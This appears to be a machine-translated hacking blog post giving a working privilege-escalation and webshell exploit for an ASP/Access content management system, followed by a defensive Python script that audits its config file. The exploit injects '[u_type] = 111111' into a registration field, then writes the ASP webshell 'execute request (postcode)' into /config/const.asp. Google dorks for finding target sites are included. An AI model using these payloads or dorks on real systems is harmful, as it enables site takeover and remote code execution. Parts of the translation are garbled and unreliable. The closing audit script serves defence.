Western Digital 0day killer Vulnerability

Source: Internet
Author: User

From baiyunyunyunyunbaiyun's Blog

Let's talk about the usage method directly.

When registering a member, enter "Chinese character, [u_type] = 111111" (note: without the double quotation marks) in the "Chinese name of the applicant" field.

Fill in other items as usual, and then register.

After registration, go to the personal data modification page.

Disable JavaScript at this point, because its verification causes a lot of trouble. After disabling it, click the "Update" button. A message is displayed indicating that the personal data was successfully modified.

Log out and log in again. You are now the super administrator.

Next, getting a webshell from the admin back end.

Because the site uses an Access database, getting a shell from the back end comes down to the usual options: backing up or restoring the database, writing to a configuration file, upload spoofing, or the IIS6 parsing problem.

The back end of this system does allow database backup, but that route is quite troublesome and is not described here.

This document only describes how to write the configuration file to get the SHELL, and does not analyze the code.

Go to the back end and find the system settings. Not all of the modifiable options are offered there, so we need to change them ourselves.

Find a field and change the value of its name attribute to reguser_level, which is a numeric type in the configuration file. Only numeric values can be used: string values have their double quotes filtered out, so they are of no use.

Change the value to 1: execute request (postcode)

Then change the zip code to. Save. In this way, the trojan is written into /config/const.asp.

If the password is a, connect to the client directly.

By Ninty
Google: inurl: news/list. asp? Newsid =
Inurl: faq/list. asp? Unid =

Animation download: http://www.virusest.com/bbs/viewthread.php? Tid = 54 & extra = page % 3D1
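
For defenders, the configuration-file step above leaves a recognizable trace: a numeric setting in /config/const.asp whose value is no longer a single plain literal. The audit script below is an added example, not code from the original post or from the affected product; the "Const name = value" line shape and the sample file contents are assumptions constructed for illustration.

```python
import re

# Assumed line shape for the generated config (not taken from the product's code):
#   [Const] name = value   ' optional VBScript comment
ASSIGN = re.compile(r"^\s*(?:Const\s+)?(?P<name>[A-Za-z_]\w*)\s*=\s*(?P<value>.*)$", re.I)
NUMERIC = re.compile(r"-?\d+(?:\.\d+)?")
STRING = re.compile(r'"(?:[^"]|"")*"')  # VBScript escapes a quote by doubling it


def strip_comment(value):
    """Drop a trailing ' comment that sits outside a string literal."""
    in_string = False
    for i, ch in enumerate(value):
        if ch == '"':
            in_string = not in_string
        elif ch == "'" and not in_string:
            return value[:i]
    return value


def audit_config(text):
    """Return (line_no, name, value) for every assignment whose right-hand
    side is not exactly one numeric literal or one quoted string literal."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = ASSIGN.match(line)
        if not m:
            continue
        value = strip_comment(m.group("value")).strip()
        if NUMERIC.fullmatch(value) or STRING.fullmatch(value):
            continue
        findings.append((line_no, m.group("name"), value))
    return findings


# Constructed sample: the last setting carries the tampered value the page describes.
SAMPLE = '''<%
Const site_name = "Example ""Co"" site"
Const page_size = 20   ' rows per page
Const reguser_level = 1: execute request (postcode)
%>'''

if __name__ == "__main__":
    for line_no, name, value in audit_config(SAMPLE):
        print(f"line {line_no}: {name} is not a plain literal: {value}")
```

The same literal-only check, applied server-side to every submitted value together with an allowlist of field names, is what keeps such a value out of the file in the first place.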
